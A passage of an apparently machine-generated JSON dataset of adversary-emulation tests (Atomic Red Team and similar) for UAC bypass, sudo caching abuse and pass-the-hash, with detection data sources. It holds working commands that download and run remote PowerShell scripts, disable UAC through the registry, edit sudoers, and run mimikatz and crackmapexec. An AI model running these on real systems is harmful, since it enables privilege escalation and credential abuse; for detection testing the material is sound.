Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\59 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 61", + "auto_generated_guid": "7825b576-744c-4555-856d-caf3460dc236", + "description": "Executes User Account Control Bypass according to the methods listed below. 
Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\61 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "WinPwn - UAC Magic", + "auto_generated_guid": "964d8bf8-37bc-4fd3-ba36-ad13761ebbcc", + "description": "UAC bypass using Magic technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique magic", + "name": "powershell" + } + }, + { + "name": "WinPwn - UAC Bypass ccmstp technique", + "auto_generated_guid": "f3c145f9-3c8d-422c-bd99-296a17a8f567", + "description": "UAC bypass using ccmstp technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\calc.exe\" -technique ccmstp", + "name": "powershell" + } + }, + { + "name": "WinPwn - UAC Bypass DiskCleanup technique", + "auto_generated_guid": "1ed67900-66cd-4b09-b546-2a0ef4431a0c", + "description": "UAC bypass using DiskCleanup technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique DiskCleanup", + "name": "powershell" + } + }, + { + "name": "WinPwn - UAC Bypass DccwBypassUAC technique", + "auto_generated_guid": "2b61977b-ae2d-4ae4-89cb-5c36c89586be", + "description": "UAC Bypass DccwBypassUAC technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')", + "name": "powershell" + } + } + ] + }, + { + "description": 
"Set a registry key to allow UAC bypass", + "id": "665432a4-42e7-4ee1-af19-a9a8c9455d0c", + "name": "UAC bypass registry", + "platforms": { + "windows": { + "psh": { + "command": "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n" + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + }, + { + "id": "95ad5d69-563e-477b-802b-4855bfb3be09", + "description": "Dll Hijack of WOW64 logger wow64log.dll using Akagi.exe", + "name": "wow64log DLL Hijack", + "platforms": { + "windows": { + "cmd,psh": { + "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n", + "payloads": [ + "Akagi64.exe" + ] + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + }, + { + "id": "b7344901-0b02-4ead-baf6-e3f629ed545f", + "description": "executes the slui exe file handler hijack", + "name": "Slui File Handler Hijack", + "platforms": { + "windows": { + "psh": { + "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n", + "payloads": [ + "Akagi64.exe" + ] + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + }, + { + "id": "e3db134c-4aed-4c5a-9607-c50183c9ef9e", + "name": "Bypass UAC Medium", + "description": "Bypass user account controls - medium", + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); 
$data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n", + "payloads": [ + "Bypass-UAC.ps1" + ] + } + } + } + }, + { + "id": "e99cce5c-cb7e-4a6e-8a09-1609a221b90a", + "description": "UIPI bypass with uiAccess application", + "name": "duser/osksupport DLL Hijack", + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n", + "payloads": [ + "Akagi64.exe" + ] + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", 
+ "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by 
applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + 
"host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1548.003", + "command_list": [ + "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n", + "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + ], + "commands": [ + { + "command": "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n", + "source": "atomics/T1548.003/T1548.003.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" + }, + { + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n", + "source": "atomics/T1548.003/T1548.003.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" + }, + { + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers", + "source": "atomics/T1548.003/T1548.003.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1548.003", + "display_name": "Abuse Elevation Control Mechanism: Sudo and Sudo Caching", + "atomic_tests": [ + { + 
"name": "Sudo usage", + "auto_generated_guid": "150c3a08-ee6e-48a6-aeaf-3659d24ceb4e", + "description": "Common Sudo enumeration methods.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + } + }, + { + "name": "Unlimited sudo cache timeout", + "auto_generated_guid": "a7b17659-dd5e-46f7-b7d1-e6792c91d0bc", + "description": "Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n" + } + }, + { + "name": "Disable tty_tickets for sudo caching", + "auto_generated_guid": "91a60b03-fb75-4d24-a42e-2eb8956e8de1", + "description": "Sets sudo caching tty_tickets value to disabled. 
This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1550.002", + "command_list": [ + "#{mimikatz_path} \"sekurlsa::pth /user:Administrator /domain:#{domain} /ntlm:#{ntlm}\"\n", + "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:cc36cf7a8514893efccd3324464tkg1a\"\n", + "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:%userdnsdomain% /ntlm:#{ntlm}\"\n", + "%tmp%\\mimikatz\\x64\\mimikatz.exe \"sekurlsa::pth 
/user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}\"\n", + "#{crackmapexec_exe} #{domain} -u Administrator -H #{ntlm} -x #{command}\n", + "C:\\CrackMapExecWin\\crackmapexec.exe #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n", + "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x whoami\n", + "#{crackmapexec_exe} #{domain} -u #{user_name} -H cc36cf7a8514893efccd3324464tkg1a -x #{command}\n", + "#{crackmapexec_exe} %userdnsdomain% -u #{user_name} -H #{ntlm} -x #{command}\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash cc36cf7a8514893efccd3324464tkg1a -Command #{command}", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username Administrator -Hash #{ntlm} -Command #{command}", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command hostname", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username #{user_name} -Hash #{ntlm} -Command #{command}" + ], + "commands": [ + { + "command": "#{mimikatz_path} \"sekurlsa::pth /user:Administrator /domain:#{domain} /ntlm:#{ntlm}\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic 
Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:cc36cf7a8514893efccd3324464tkg1a\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:%userdnsdomain% /ntlm:#{ntlm}\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "%tmp%\\mimikatz\\x64\\mimikatz.exe \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} #{domain} -u Administrator -H #{ntlm} -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "C:\\CrackMapExecWin\\crackmapexec.exe #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x whoami\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} #{domain} -u #{user_name} -H cc36cf7a8514893efccd3324464tkg1a -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} %userdnsdomain% -u #{user_name} -H #{ntlm} -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + 
"name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash cc36cf7a8514893efccd3324464tkg1a -Command #{command}", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username Administrator -Hash #{ntlm} -Command #{command}", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command hostname", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username #{user_name} -Hash #{ntlm} -Command #{command}", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication 
Material: Pass the Hash" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1550.002", + "display_name": "Use Alternate Authentication Material: Pass the Hash", + "atomic_tests": [ + { + "name": "Mimikatz Pass the Hash", + "auto_generated_guid": "ec23cef9-27d9-46e4-a68d-6f75f7b86908", + "description": "Note: must dump hashes first\n[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "username", + "type": "String", + "default": "Administrator" + }, + "ntlm": { + "description": "ntlm hash", + "type": "String", + "default": "cc36cf7a8514893efccd3324464tkg1a" + }, + "domain": { + "description": "domain", + "type": "String", + "default": "%userdnsdomain%" + }, + "mimikatz_path": { + "description": "mimikatz windows executable", + "type": "Path", + "default": "%tmp%\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + } + ], + "executor": { + "command": "#{mimikatz_path} \"sekurlsa::pth 
/user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}\"\n", + "name": "command_prompt" + } + }, + { + "name": "crackmapexec Pass the Hash", + "auto_generated_guid": "eb05b028-16c8-4ad8-adea-6f5b219da9a9", + "description": "command execute with crackmapexec\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "username", + "type": "String", + "default": "Administrator" + }, + "crackmapexec_exe": { + "description": "crackmapexec windows executable", + "type": "Path", + "default": "C:\\CrackMapExecWin\\crackmapexec.exe" + }, + "command": { + "description": "command to execute", + "type": "String", + "default": "whoami" + }, + "ntlm": { + "description": "command", + "type": "String", + "default": "cc36cf7a8514893efccd3324464tkg1a" + }, + "domain": { + "description": "domain", + "type": "String", + "default": "%userdnsdomain%" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})\n", + "prereq_command": "if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}\n" + } + ], + "executor": { + "command": "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n", + "name": "command_prompt" + } + }, + { + "name": "Invoke-WMIExec Pass the Hash", + "auto_generated_guid": "f8757545-b00a-4e4e-8cfb-8cfb961ee713", + "description": "Use Invoke-WMIExec to Pass the Hash\nNote: must dump hashes first\n[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ntlm": { + "description": "ntlm hash", + "type": "string", + "default": "cc36cf7a8514893efccd3324464tkg1a" + }, + "user_name": { + "description": "username", + "type": "string", + "default": 
"Administrator" + }, + "command": { + "description": "Command to run on target system", + "type": "string", + "default": "hostname" + }, + "target": { + "description": "System to run command on", + "type": "string", + "default": "$env:COMPUTERNAME" + } + }, + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", 